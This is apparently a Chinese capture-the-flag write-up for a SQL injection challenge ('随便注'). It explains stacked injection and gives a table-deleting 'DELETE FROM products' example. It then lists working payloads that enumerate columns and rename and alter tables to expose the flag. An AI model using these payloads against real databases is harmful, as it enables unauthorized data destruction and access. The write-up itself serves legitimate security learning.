buu_web-[强网杯 2019]随便注 1

考点:堆叠注入原理

• 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。
• 而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？
• 区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1. DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。

加上单引号之后报错,但是注释掉后恢复正常,说明存在sql注入(题目的名字也疯狂暗示了
order by 查询列数 列数为2

使用了正则来过滤 在该情况下不能使用联合注入

尝试堆叠注入,成功!查询数据库名

1’ ;show columns from 1919810931114514;#

我们可以知道当前的表是words

可以将words改名成任意名,然后’1919810931114514’改成words,加入id这列以及修改属性

payload:1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

//sql语句:
1';
alter table words rename to word1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#